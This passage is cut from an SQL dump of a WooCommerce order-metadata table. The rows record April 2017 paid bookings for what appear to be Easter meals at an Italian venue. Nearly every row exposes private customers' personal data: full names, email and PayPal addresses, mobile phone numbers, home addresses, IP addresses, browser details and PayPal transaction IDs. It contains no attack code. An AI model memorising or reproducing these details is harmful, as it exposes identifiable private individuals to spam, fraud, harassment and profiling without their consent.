94'),(4440,357,'_billing_city','Brescia'),(4441,357,'_shipping_first_name','Gianpaolo'),(4442,357,'_shipping_last_name','Frosi'),(4443,357,'_shipping_company',''),(4444,357,'_shipping_country',''),(4445,357,'_shipping_address_1','Via Pertini 94'),(4446,357,'_shipping_address_2',''),(4447,357,'_shipping_city','Brescia'),(4448,357,'_shipping_state',''),(4449,357,'_shipping_postcode',''),(4450,357,'_payment_method','paypal'),(4451,357,'_payment_method_title','PayPal'),(4452,357,'_order_shipping',''),(4453,357,'_cart_discount','0'),(4454,357,'_cart_discount_tax','0'),(4455,357,'_order_tax','0'),(4456,357,'_order_shipping_tax','0'),(4457,357,'_order_total','50.00'),(4458,357,'Numero Persone Adulte','2'),(4459,357,'Numero bambini fino a 6 anni',''),(4460,357,'Numero ragazzi fino a 13 anni',''),(4461,357,'Files attached','[]'),(4462,357,'Payer PayPal address','mumu61@alice.it'),(4463,357,'Payer first name','gian paolo'),(4464,357,'Payer last name','frosi'),(4465,357,'Payment type','instant'),(4466,357,'_download_permissions_granted','1'),(4467,357,'_recorded_sales','yes'),(4468,357,'_paid_date','2017-04-04 09:37:14'),(4469,357,'_transaction_id','6HU955088F3371327'),(4470,357,'_order_stock_reduced','1'),(4471,357,'PayPal Transaction Fee','2.05'),(4472,358,'_order_key','wc_order_58e3e4413a768'),(4473,358,'_order_currency','EUR'),(4474,358,'_prices_include_tax','no'),(4475,358,'_customer_ip_address','151.16.117.232'),(4476,358,'_customer_user_agent','Mozilla/5.0 (iPad; CPU OS 9_3_5 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13G36 Safari/601.1'),(4477,358,'_customer_user','0'),(4478,358,'_created_via','checkout'),(4479,358,'_cart_hash','9fc8f4788cf201ff6506a57f3d1dadc2'),(4480,358,'_order_version','2.6.14'),(4481,358,'_billing_first_name','Manuele'),(4482,358,'_billing_last_name','Colombini'),(4483,358,'_billing_email','Palazzodallay@hotmail.it'),(4484,358,'_billing_phone','3472121290'),(4485,358,'_billing_address_1',''),(4486,358,'_billing_city',''),(4487,358,'_shipping_first_name','Manuele'),(4488,358,'_shipping_last_name','Colombini'),(4489,358,'_shipping_company',''),(4490,358,'_shipping_country',''),(4491,358,'_shipping_address_1',''),(4492,358,'_shipping_address_2',''),(4493,358,'_shipping_city',''),(4494,358,'_shipping_state',''),(4495,358,'_shipping_postcode',''),(4496,358,'_payment_method','paypal'),(4497,358,'_payment_method_title','PayPal'),(4498,358,'_order_shipping',''),(4499,358,'_cart_discount','0'),(4500,358,'_cart_discount_tax','0'),(4501,358,'_order_tax','0'),(4502,358,'_order_shipping_tax','0'),(4503,358,'_order_total','50.00'),(4504,358,'Numero Persone Adulte','2'),(4505,358,'Numero bambini fino a 6 anni',''),(4506,358,'Numero ragazzi fino a 13 anni',''),(4507,358,'Files attached','[]'),(4508,359,'_order_key','wc_order_58e3e5c808a51'),(4509,359,'_order_currency','EUR'),(4510,359,'_prices_include_tax','no'),(4511,359,'_customer_ip_address','151.16.117.232'),(4512,359,'_customer_user_agent','Mozilla/5.0 (iPad; CPU OS 9_3_5 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13G36 Safari/601.1'),(4513,359,'_customer_user','0'),(4514,359,'_created_via','checkout'),(4515,359,'_cart_hash','9fc8f4788cf201ff6506a57f3d1dadc2'),(4516,359,'_order_version','2.6.14'),(4517,359,'_billing_first_name','Manuele'),(4518,359,'_billing_last_name','Colombini'),(4519,359,'_billing_email','Palazzodallay@hotmail.it'),(4520,359,'_billing_phone','3472121290'),(4521,359,'_billing_address_1',''),(4522,359,'_billing_city',''),(4523,359,'_shipping_first_name','Manuele'),(4524,359,'_shipping_last_name','Colombini'),(4525,359,'_shipping_company',''),(4526,359,'_shipping_country',''),(4527,359,'_shipping_address_1',''),(4528,359,'_shipping_address_2',''),(4529,359,'_shipping_city',''),(4530,359,'_shipping_state',''),(4531,359,'_shipping_postcode',''),(4532,359,'_payment_method','paypal'),(4533,359,'_payment_method_title','PayPal'),(4534,359,'_order_shipping',''),(4535,359,'_cart_discount','0'),(4536,359,'_cart_discount_tax','0'),(4537,359,'_order_tax','0'),(4538,359,'_order_shipping_tax','0'),(4539,359,'_order_total','50.00'),(4540,359,'Numero Persone Adulte','2'),(4541,359,'Numero bambini fino a 6 anni',''),(4542,359,'Numero ragazzi fino a 13 anni',''),(4543,359,'Files attached','[]'),(4544,359,'Payer PayPal address','palazzodallay@hotmail.it'),(4545,359,'Payer first name','la calamita sas'),(4546,359,'Payer last name','manuele colombini'),(4547,359,'Payment type','instant'),(4548,359,'_download_permissions_granted','1'),(4549,359,'_recorded_sales','yes'),(4550,359,'_paid_date','2017-04-04 20:29:23'),(4551,359,'_transaction_id','62R24216EE965243Y'),(4552,359,'_order_stock_reduced','1'),(4553,359,'PayPal Transaction Fee','2.05'),(4554,360,'_order_key','wc_order_58e4cce7ba3ae'),(4555,360,'_order_currency','EUR'),(4556,360,'_prices_include_tax','no'),(4557,360,'_customer_ip_address','213.82.11.100'),(4558,360,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),(4559,360,'_customer_user','0'),(4560,360,'_created_via','checkout'),(4561,360,'_cart_hash','7c52a3a41a7d0a571fe047e0693c0399'),(4562,360,'_order_version','2.6.14'),(4563,360,'_billing_first_name','pietro'),(4564,360,'_billing_last_name','schepis'),(4565,360,'_billing_email','schepisp@libero.it'),(4566,360,'_billing_phone','3317150856'),(4567,360,'_billing_address_1','via filippo brunetti 20'),(4568,360,'_billing_city','Firenze'),(4569,360,'_shipping_first_name','pietro'),(4570,360,'_shipping_last_name','schepis'),(4571,360,'_shipping_company',''),(4572,360,'_shipping_country',''),(4573,360,'_shipping_address_1','via filippo brunetti 20'),(4574,360,'_shipping_address_2',''),(4575,360,'_shipping_city','Firenze'),(4576,360,'_shipping_state',''),(4577,360,'_shipping_postcode',''),(4578,360,'_payment_method','paypal'),(4579,360,'_payment_method_title','PayPal'),(4580,360,'_order_shipping',''),(4581,360,'_cart_discount','0'),(4582,360,'_cart_discount_tax','0'),(4583,360,'_order_tax','0'),(4584,360,'_order_shipping_tax','0'),(4585,360,'_order_total','100.00'),(4586,360,'Numero Persone Adulte','2'),(4587,360,'Numero bambini fino a 6 anni',''),(4588,360,'Numero ragazzi fino a 13 anni','2'),(4589,360,'Files attached','[]'),(4590,360,'Payer PayPal address','schepisp@libero.it'),(4591,360,'Payer first name','pietro'),(4592,360,'Payer last name','schepis'),(4593,360,'Payment type','instant'),(4594,360,'_download_permissions_granted','1'),(4595,360,'_recorded_sales','yes'),(4596,360,'_paid_date','2017-04-05 12:58:52'),(4597,360,'_transaction_id','15K24483PR504864E'),(4598,360,'_order_stock_reduced','1'),(4599,360,'PayPal Transaction Fee','3.75'),(4600,361,'_order_key','wc_order_58e5efb0c723c'),(4601,361,'_order_currency','EUR'),(4602,361,'_prices_include_tax','no'),(4603,361,'_customer_ip_address','95.246.54.21'),(4604,361,'_customer_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50'),(4605,361,'_customer_user','0'),(4606,361,'_created_via','checkout'),(4607,361,'_cart_hash','a47f2f74111cf274d47d9126241bb87b'),(4608,361,'_order_version','2.6.14'),(4609,361,'_billing_first_name','Piera'),(4610,361,'_billing_last_name','Casali'),(4611,361,'_billing_email','pitercasali@hotmail.it'),(4612,361,'_billing_phone','3336627860'),(4613,361,'_billing_address_1','Via dell\'Ambiente 2/c'),(4614,361,'_billing_city','Ozzano dell\'Emilia'),(4615,361,'_shipping_first_name','Piera'),(4616,361,'_shipping_last_name','Casali'),(4617,361,'_shipping_company',''),(4618,361,'_shipping_country',''),(4619,361,'_shipping_address_1','Via dell\'Ambiente 2/c'),(4620,361,'_shipping_address_2',''),(4621,361,'_shipping_city','Ozzano dell\'Emilia'),(4622,361,'_shipping_state',''),(4623,361,'_shipping_postcode',''),(4624,361,'_payment_method','paypal'),(4625,361,'_payment_method_title','PayPal'),(4626,361,'_order_shipping',''),(4627,361,'_cart_discount','0'),(4628,361,'_cart_discount_tax','0'),(4629,361,'_order_tax','0'),(4630,361,'_order_shipping_tax','0'),(4631,361,'_order_total','150.00'),(4632,361,'Numero Persone Adulte','2'),(4633,361,'Numero bambini fino a 6 anni',''),(4634,361,'Numero ragazzi fino a 13 anni',''),(4635,361,'Files attached','[]'),(4636,361,'Payer PayPal address','pitercasali@hotmail.it'),(4637,361,'Payer first name','Piera'),(4638,361,'Payer last name','casali'),(4639,361,'Payment type','instant'),(4640,361,'_download_permissions_granted','1'),(4641,361,'_recorded_sales','yes'),(4642,361,'_paid_date','2017-04-06 09:38:16'),(4643,361,'_transaction_id','0W546523C0845954U'),(4644,361,'_order_stock_reduced','1'),(4645,361,'PayPal Transaction Fee','5.45'),(4646,362,'_order_key','wc_order_58e642be86384'),(4647,362,'_order_currency','EUR'),(4648,362,'_prices_include_tax','no'),(4649,362,'_customer_ip_address','82.60.132.126'),(4650,362,'_customer_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14'),(4651,362,'_customer_user','0'),(4652,362,'_created_via','checkout'),(4653,362,'_cart_hash','9fc8f4788cf201ff6506a57f3d1dadc2'),(4654,362,'_order_version','2.6.14'),(4655,362,'_billing_first_name','giorgia'),(4656,362,'_billing_last_name','bergonzini'),(4657,362,'_billing_email','giorgiabergonzini1992@gmail.com'),(4658,362,'_billing_phone','3335724256'),(4659,362,'_billing_address_1','via agnini 17'),(4660,362,'_billing_city','san cesario sul panaro'),(4661,362,'_shipping_first_name','giorgia'),(4662,362,'_shipping_last_name','bergonzini'),(4663,362,'_shipping_company',''),(4664,362,'_shipping_country',''),(4665,362,'_shipping_address_1','via agnini 17'),(4666,362,'_shipping_address_2',''),(4667,362,'_shipping_city','san cesario sul panaro'),(4668,362,'_shipping_state',''),(4669,362,'_shipping_postcode',''),(4670,362,'_payment_method','paypal'),(4671,362,'_payment_method_title','PayPal'),(4672,362,'_order_shipping',''),(4673,362,'_cart_discount','0'),(4674,362,'_cart_discount_tax','0'),(4675,362,'_order_tax','0'),(4676,362,'_order_shipping_tax','0'),(4677,362,'_order_total','50.00'),(4678,362,'Numero Persone Adulte','2'),(4679,362,'Numero bambini fino a 6 anni',''),(4680,362,'Numero ragazzi fino a 13 anni',''),(4681,362,'Files attached','[]'),(4682,362,'Payer PayPal address','giorgiabergonzini1992@gmail.com'),(4683,362,'Payer first name','andrea'),(4684,362,'Payer last name','beggi'),(4685,362,'Payment type','instant'),(4686,362,'_download_permissions_granted','1'),(4687,362,'_recorded_sales','yes'),(4688,362,'_paid_date','2017-04-06 15:32:58'),(4689,362,'_transaction_id','7KY86521FA925101L'),(4690,362,'_order_stock_reduced','1'),(4691,362,'PayPal Transaction Fee','2.05'),(4692,363,'_order_key','wc_order_58e7f6a07cb98'),(4693,363,'_order_currency','EUR'),(4694,363,'_prices_include_tax','no'),(4695,363,'_customer_ip_address','5.90.63.112'),(4696,363,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 10_1_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) GSA/24.1.151204851 Mobile/14B100 Safari/602.1'),(4697,363,'_customer_user','12'),(4698,363,'_created_via','checkout'),(4699,363,'_cart_hash','79933357867cf7ca67c9e69e42b946c2'),(4700,363,'_order_version','2.6.14'),(4701,363,'_billing_first_name','Edoardo'),(4702,363,'_billing_last_name','Zona'),(4703,363,'_billing_email','Edoardozona@msn.com'),(4704,363,'_billing_phone','3371083343'),(4705,363,'_billing_address_1','Via Don Piero Folli 77'),(4706,363,'_billing_city','Luino'),(4707,363,'_shipping_first_name','Edoardo'),(4708,363,'_shipping_last_name','Zona'),(4709,363,'_shipping_company',''),(4710,363,'_shipping_country',''),(4711,363,'_shipping_address_1','Via Don Piero Folli 77'),(4712,363,'_shipping_address_2',''),(4713,363,'_shipping_city','Luino'),(4714,363,'_shipping_state',''),(4715,363,'_shipping_postcode',''),(4716,363,'_payment_method','paypal'),(4717,363,'_payment_method_title','PayPal'),(4718,363,'_order_shipping',''),(4719,363,'_cart_discount','0'),(4720,363,'_cart_discount_tax','0'),(4721,363,'_order_tax','0'),(4722,363,'_order_shipping_tax','0'),(4723,363,'_order_total','50.00'),(4724,363,'Numero Persone Adulte','1'),(4725,363,'Numero bambini fino a 6 anni',''),(4726,363,'Numero ragazzi fino a 13 anni','1'),(4727,363,'Files attached','[]'),(4728,363,'Payer PayPal address','info@zona-piscine.it'),(4729,363,'Payer first name','Edoardo'),(4730,363,'Payer last name','Zona'),(4731,363,'Payment type','instant'),(4732,363,'_download_permissions_granted','1'),(4733,363,'_recorded_sales','yes'),(4734,363,'_paid_date','2017-04-07 22:30:17'),(4735,363,'_transaction_id','0NN79493X0783034E'),(4736,363,'_order_stock_reduced','1'),(4737,363,'PayPal Transaction Fee','2.05'),(4738,364,'_order_key','wc_order_58ea03fa489f3'),(4739,364,'_order_currency','EUR'),(4740,364,'_prices_include_tax','no'),(4741,364,'_customer_ip_address','5.90.42.26'),(4742,364,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) GSA/24.1.151204851 Mobile/13B143 Safari/601.1'),(4743,364,'_customer_user','0'),(4744,364,'_created_via','checkout'),(4745,364,'_cart_hash','fcc2a89ac01df8f822c92489e06bb8e6'),(4746,364,'_order_version','2.6.14'),(4747,364,'_billing_first_name','Elisa'),(4748,364,'_billing_last_name','Zini'),(4749,364,'_billing_email','Elisazini76@gmail.com'),(4750,364,'_billing_phone','3341515965'),(4751,364,'_billing_address_1','Fogazzaro,43'),(4752,364,'_billing_city','Vignola(MO)'),(4753,364,'_shipping_first_name','Elisa'),(4754,364,'_shipping_last_name','Zini'),(4755,364,'_shipping_company',''),(4756,364,'_shipping_country',''),(4757,364,'_shipping_address_1','Fogazzaro,43'),(4758,364,'_shipping_address_2',''),(4759,364,'_shipping_city','Vignola(MO)'),(4760,364,'_shipping_state',''),(4761,364,'_shipping_postcode',''),(4762,364,'_payment_method','paypal'),(4763,364,'_payment_method_title','PayPal'),(4764,364,'_order_shipping',''),(4765,364,'_cart_discount','0'),(4766,364,'_cart_discount_tax','0'),(4767,364,'_order_tax','0'),(4768,364,'_order_shipping_tax','0'),(4769,364,'_order_total','75.00'),(4770,364,'Numero Persone Adulte','2'),(4771,364,'Numero bambini fino a 6 anni',''),(4772,364,'Numero ragazzi fino a 13 anni','1'),(4773,364,'Files attached','[]'),(4774,364,'Payer PayPal address','Elisazini76@gmail.com'),(4775,364,'Payer first name','elisa'),(4776,364,'Payer last name','zini'),(4777,364,'Payment type','instant'),(4778,364,'_download_permissions_granted','1'),(4779,364,'_recorded_sales','yes'),(4780,364,'_paid_date','2017-04-09 11:53:36'),(4781,364,'_transaction_id','5S522317H1320262V'),(4782,364,'_order_stock_reduced','1'),(4783,364,'PayPal Transaction Fee','2.90'),(4784,365,'_order_key','wc_order_58ea09f8ab0a2'),(4785,365,'_order_currency','EUR'),(4786,365,'_prices_include_tax','no'),(4787,365,'_customer_ip_address','91.253.176.166'),(4788,365,'_customer_user_agent','Mozilla/5.0 (Linux; Android 7.0; ONEPLUS A3003 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),(4789,365,'_customer_user','0'),(4790,365,'_created_via','checkout'),(4791,365,'_cart_hash','9fc8f4788cf201ff6506a57f3d1dadc2'),(4792,365,'_order_version','2.6.14'),(4793,365,'_billing_first_name','Marilena'),(4794,365,'_billing_last_name','Zambelli'),(4795,365,'_billing_email','Marilena.zambelli@gmail.com'),(4796,365,'_billing_phone','3662111567'),(4797,365,'_billing_address_1','Via padre Ernesto Balducci 8'),(4798,365,'_billing_city','Firenze'),(4799,365,'_shipping_first_name','Marilena'),(4800,365,'_shipping_last_name','Zambelli'),(4801,365,'_shipping_company',''),(4802,365,'_shipping_country',''),(4803,365,'_shipping_address_1','Via padre Ernesto Balducci 8'),(4804,365,'_shipping_address_2',''),(4805,365,'_shipping_city','Firenze'),(4806,365,'_shipping_state',''),(4807,365,'_shipping_postcode',''),(4808,365,'_payment_method','paypal'),(4809,365,'_payment_method_title','PayPal'),(4810,365,'_order_shipping',''),(4811,365,'_cart_discount','0'),(4812,365,'_cart_discount_tax','0'),(4813,365,'_order_tax','0'),(4814,365,'_order_shipping_tax','0'),(4815,365,'_order_total','50.00'),(4816,365,'Numero Persone Adulte','2'),(4817,365,'Numero bambini fino a 6 anni',''),(4818,365,'Numero ragazzi fino a 13 anni',''),(4819,365,'Files attached','[]'),(4820,365,'Payer PayPal address','marilena.zambelli@gmail.com'),(4821,365,'Payer first name','Marilena'),(4822,365,'Payer last name','Zambelli'),(4823,365,'Payment type','instant'),(4824,365,'_download_permissions_granted','1'),(4825,365,'_recorded_sales','yes'),(4826,365,'_paid_date','2017-04-09 12:17:05'),(4827,365,'_transaction_id','3VP46254039399028'),(4828,365,'_order_stock_reduced','1'),(4829,365,'PayPal Transaction Fee','2.05'),(4830,366,'_order_key','wc_order_58ecae39c10ba'),(4831,366,'_order_currency','EUR'),(4832,366,'_prices_include_tax','no'),(4833,366,'_customer_ip_address','37.227.7.55'),(4834,366,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) GSA/24.1.151204851 Mobile/14E304 Safari/602.1'),(4835,366,'_customer_user','0'),(4836,366,'_created_via','checkout'),(4837,366,'_cart_hash','081b1edc8a931c28ecf2b77616582daa'),(4838,366,'_order_version','2.6.14'),(4839,366,'_billing_first_name','Antonio'),(4840,366,'_billing_last_name','Santoni'),(4841,366,'_billing_email','Anthelord@hotmail.it'),(4842,366,'_billing_phone','3487977799'),(4843,366,'_billing_address_1','Via Olivello n\' 20'),(4844,366,'_billing_city','Torgiano (PG)'),(4845,366,'_shipping_first_name','Antonio'),(4846,366,'_shipping_last_name','Santoni'),(4847,366,'_shipping_company',''),(4848,366,'_shipping_country',''),(4849,366,'_shipping_address_1','Via Olivello n\' 20'),(4850,366,'_shipping_address_2',''),(4851,366,'_shipping_city','Torgiano (PG)'),(4852,366,'_shipping_state',''),(4853,366,'_shipping_postcode',''),(4854,366,'_payment_method','paypal'),(4855,366,'_payment_method_title','PayPal'),(4856,366,'_order_shipping',''),(4857,366,'_cart_discount','0'),(4858,366,'_cart_discount_tax','0'),(4859,366,'_order_tax','0'),(4860,366,'_order_shipping_tax','0'),(4861,366,'_order_total','75.00'),(4862,366,'Numero Persone Adulte','2'),(4863,366,'Numero bambini fino a 6 anni',''),(4864,366,'Numero ragazzi fino a 13 anni',''),(4865,366,'Files attached','[]'),(4866,366,'Payer PayPal address','anthelord@hotmail.it'),(4867,366,'Payer first name','Antonio'),(4868,366,'Payer last name','Santoni'),(4869,366,'Payment type','instant'),(4870,366,'_download_permissions_granted','1'),(4871,366,'_recorded_sales','yes'),(4872,366,'_paid_date','2017-04-11 12:22:32'),(4873,366,'_transaction_id','1E475208XW175230R'),(4874,366,'_order_stock_reduced','1'),(4875,366,'PayPal Transaction Fee','2.90'),(4876,367,'_order_key','wc_order_58ecca1f530f8'),(4877,367,'_order_currency','EUR'),(4878,367,'_prices_include_tax','no'),(4879,367,'_customer_ip_address','79.2.28.71'),(4880,367,'_customer_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0.2 Safari/602.3.12'),(4881,367,'_customer_user','0'),(4882,367,'_created_via','checkout'),(4883,367,'_cart_hash','e6239e8074fe58c07ea3a87e17d515f0'),(4884,367,'_order_version','2.6.14'),(4885,367,'_billing_first_name','daniela'),(4886,367,'_billing_last_name','bergonzini'),(4887,367,'_billing_email','bergonzinidaniela12@gmail.com'),(4888,367,'_billing_phone','3406633580'),(4889,367,'_billing_address_1','via croce conta 1'),(4890,367,'_billing_city','dozza'),(4891,367,'_shipping_first_name','daniela'),(4892,367,'_shipping_last_name','bergonzini'),(4893,367,'_shipping_company',''),(4894,367,'_shipping_country',''),(4895,367,'_shipping_address_1','via croce conta 1'),(4896,367,'_shipping_address_2',''),(4897,367,'_shipping_city','dozza'),(4898,367,'_shipping_state',''),(4899,367,'_shipping_postcode',''),(4900,367,'_payment_method','paypal'),(4901,367,'_payment_method_title','PayPal'),(4902,367,'_order_shipping',''),(4903,367,'_cart_discount','0'),(4904,367,'_cart_discount_tax','0'),(4905,367,'_order_tax','0'),(4906,367,'_order_shipping_tax','0'),(4907,367,'_order_total','100.00'),(4908,367,'Numero Persone Adulte','4'),(4909,367,'Numero bambini fino a 6 anni',''),(4910,367,'Numero ragazzi fino a 13 anni',''),(4911,367,'Files attached','[]'),(4912,368,'_order_key','wc_order_58ecd2646ea59'),(4913,368,'_order_currency','EUR'),(4914,368,'_prices_include_tax','no'),(4915,368,'_customer_ip_address','193.227.71.111'),(4916,368,'_customer_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(4917,368,'_customer_user','0'),(4918,368,'_created_via','checkout'),(4919,368,'_cart_hash','e6239e8074fe58c07ea3a87e17d515f0'),(4920,368,'_order_version','2.6.14'),(4921,368,'_billing_first_name','Piermario'),(4922,368,'_billing_last_name','Pariotti'),(4923,368,'_billing_email','pariotti@me.com'),(4924,368,'_billing_phone','335 227387'),(4925,368,'_billing_address_1','croce conta 1'),(4926,368,'_billing_city','dozza'),(4927,368,'_shipping_first_name','Piermario'),(4928,368,'_shipping_last_name','Pariotti'),(4929,368,'_shipping_company',''),(4930,368,'_shipping_country',''),(4931,368,'_shipping_address_1','croce conta 1'),(4932,368,'_shipping_address_2',''),(4933,368,'_shipping_city','dozza'),(4934,368,'_shipping_state',''),(4935,368,'_shipping_postcode',''),(4936,368,'_payment_method','paypal'),(4937,368,'_payment_method_title','PayPal'),(4938,368,'_order_shipping',''),(4939,368,'_cart_discount','0'),(4940,368,'_cart_discount_tax','0'),(4941,368,'_order_tax','0'),(4942,368,'_order_shipping_tax','0'),(4943,368,'_order_total','100.00'),(4944,368,'Numero Persone Adulte','4'),(4945,368,'Numero bambini fino a 6 anni',''),(4946,368,'Numero ragazzi fino a 13 anni',''),(4947,368,'Files attached','[]'),(4948,368,'Payer PayPal address','pariotti@me.com'),(4949,368,'Payer first name','Piermario'),(4950,368,'Payer last name','Pariotti'),(4951,368,'Payment type','instant'),(4952,368,'_download_permissions_granted','1'),(4953,368,'_recorded_sales','yes'),(4954,368,'_paid_date','2017-04-11 14:57:27'),(4955,368,'_transaction_id','7G6099620M223864J'),(4956,368,'_order_stock_reduced','1'),(4957,368,'PayPal Transaction Fee','3.75'),(4958,369,'_order_key','wc_order_58ecdea04641b'),(4959,369,'_order_currency','EUR'),(4960,369,'_prices_include_tax','no'),(4961,369,'_customer_ip_address','217.133.30.241'),(4962,369,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),(4963,369,'_customer_user','0'),(4964,369,'_created_via','checkout'),(4965,369,'_cart_hash','a47f2f74111cf274d47d9126241bb87b'),(4966,369,'_order_version','2.6.14'),(4967,369,'_billing_first_name','stefano'),(4968,369,'_billing_last_name','brugoni'),(4969,369,'_billing_email','s.brugoni@alice.it'),(4970,369,'_billing_phone','3351210424'),(4971,369,'_billing_address_1','via francesco coli, 32'),(4972,369,'_billing_city','deruta'),(4973,369,'_shipping_first_name','stefano'),(4974,369,'_shipping_last_name','brugoni'),(4975,369,'_shipping_company',''),(4976,369,'_shipping_country',''),(4977,369,'_shipping_address_1','via francesco coli, 32'),(4978,369,'_shipping_address_2',''),(4979,369,'_shipping_city','deruta'),(4980,369,'_shipping_state',''),(4981,369,'_shipping_postcode',''),(4982,369,'_payment_method','paypal'),(4983,369,'_payment_method_title','PayPal'),(4984,369,'_order_shipping',''),(4985,369,'_cart_discount','0'),(4986,369,'_cart_discount_tax','0'),(4987,369,'_order_tax','0'),(4988,369,'_order_shipping_tax','0'),(4989,369,'_order_total','150.00'),(4990,369,'Numero Persone Adulte','6'),(4991,369,'Numero bambini fino a 6 anni',''),(4992,369,'Numero ragazzi fino a 13 anni',''),(4993,369,'Files attached','[]'),(4994,369,'Payer PayPal address','s.brugoni@alice.it'),(4995,369,'Payer first name','stefano'),(4996,369,'Payer last name','brugoni'),(4997,369,'Payment type','instant'),(4998,369,'_download_permissions_granted','1'),(4999,369,'_recorded_sales','yes'),(5000,369,'_paid_date','2017-04-11 15:51:24'),(5001,369,'_transaction_id','3CY02169RS3090448'),(5002,369,'_order_stock_reduced','1'),(5003,369,'PayPal Transaction Fee','5.45'),(5004,370,'_order_key','wc_order_58ece10cb3769'),(5005,370,'_order_currency','EUR'),(5006,370,'_prices_include_tax','no'),(5007,370,'_customer_ip_address','217.133.30.241'),(5008,370,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),(5009,370,'_customer_user','0'),(5010,370,'_created_via','checkout'),(5011,370,'_cart_hash','9700ff19196dfa6349177757b059acd0'),(5012,370,'_order_version','2.6.14'),(5013,370,'_billing_first_name','stefano'),(5014,370,'_billing_last_name','brugoni'),(5015,370,'_billing_email','s.brugoni@alice.it'),(5016,370,'_billing_phone','3351210424'),(5017,370,'_billing_address_1','via francesco coli 32'),(5018,370,'_billing_city','Deruta'),(5019,370,'_shipping_first_name','stefano'),(5020,370,'_shipping_last_name','brugoni'),(5021,370,'_shipping_company',''),(5022,370,'_shipping_country',''),(5023,370,'_shipping_address_1','via francesco coli 32'),(5024,370,'_shipping_address_2',''),(5025,370,'_shipping_city','Deruta'),(5026,370,'_shipping_state',''),(5027,370,'_shipping_postcode',''),(5028,370,'_payment_method','paypal'),(5029,370,'_payment_method_title','PayPal'),(5030,370,'_order_shipping',''),(5031,370,'_cart_discount','0'),(5032,370,'_cart_discount_tax','0'),(5033,370,'_order_tax','0'),(5034,370,'_order_shipping_tax','0'),(5035,370,'_order_total','225.00'),(5036,370,'Numero Persone Adulte','9 realmente siamo in 8 adulti come ho anticipato telefonicamente ad Andrea in data 11/04/2017'),(5037,370,'Numero bambini fino a 6 anni',''),(5038,370,'Numero ragazzi fino a 13 anni',''),(5039,370,'Files attached','[]'),(5040,370,'Payer PayPal address','s.brugoni@alice.it'),(5041,370,'Payer first name','stefano'),(5042,370,'Payer last name','brugoni'),(5043,370,'Payment type','instant'),(5044,370,'_download_permissions_granted','1'),(5045,370,'_recorded_sales','yes'),(5046,370,'_paid_date','2017-04-11 16:01:47'),(5047,370,'_transaction_id','2YE21968AC551501K'),(5048,370,'_order_stock_reduced','1'),(5049,370,'PayPal Transaction Fee','8.00'),(5050,371,'_order_key','wc_order_58ed0d55618c9'),(5051,371,'_order_currency','EUR'),(5052,371,'_prices_include_tax','no'),(5053,371,'_customer_ip_address','37.116.155.231'),(5054,371,'_customer_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8'),(5055,371,'_customer_user','0'),(5056,371,'_created_via','checkout'),(5057,371,'_cart_hash','428de34bd0bfb3de0b0ca3e0ee890527'),(5058,371,'_order_version','2.6.14'),(5059,371,'_billing_first_name','Valerio'),(5060,371,'_billing_last_name','Gnucci'),(5061,371,'_billing_email','valerio@gnucci.it'),(5062,371,'_billing_phone','3288008000'),(5063,371,'_billing_address_1',''),(5064,371,'_billing_city','Riccione'),(5065,371,'_shipping_first_name','Valerio'),(5066,371,'_shipping_last_name','Gnucci'),(5067,371,'_shipping_company',''),(5068,371,'_shipping_country',''),(5069,371,'_shipping_address_1',''),(5070,371,'_shipping_address_2',''),(5071,371,'_shipping_city','Riccione'),(5072,371,'_shipping_state',''),(5073,371,'_shipping_postcode',''),(5074,371,'_payment_method','paypal'),(5075,371,'_payment_method_title','PayPal'),(5076,371,'_order_shipping',''),(5077,371,'_cart_discount','0'),(5078,371,'_cart_discount_tax','0'),(5079,371,'_order_tax','0'),(5080,371,'_order_shipping_tax','0'),(5081,371,'_order_total','175.00'),(5082,371,'Numero Persone Adulte','7'),(5083,371,'Numero bambini fino a 6 anni','1'),(5084,371,'Numero ragazzi fino a 13 anni',''),(5085,371,'Files attached','[]'),(5086,371,'Payer PayPal address','info@valericcione.ch'),(5087,371,'Payer first name','Valerio'),(5088,371,'Payer last name','Rossi'),(5089,371,'Payment type','instant'),(5090,371,'_download_permissions_granted','1'),(5091,371,'_recorded_sales','yes'),(5092,371,'_paid_date','2017-04-11 19:08:19'),(5093,371,'_transaction_id','3HR77575V9667263N'),(5094,371,'_order_stock_reduced','1'),(5095,371,'PayPal Transaction Fee','6.30'),(5096,334,'_wp_old_slug','prenotazione-tavolo-per-7-persone-pasqua-2'),(5097,325,'_wp_old_slug','prenotazione-tavolo-6-persone-pasqua'),(5098,372,'_order_key','wc_order_58ee1993d214f'),(5099,372,'_order_currency','EUR'),(5100,372,'_prices_include_tax','no'),(5101,372,'_customer_ip_address','155.185.27.222'),(5102,372,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 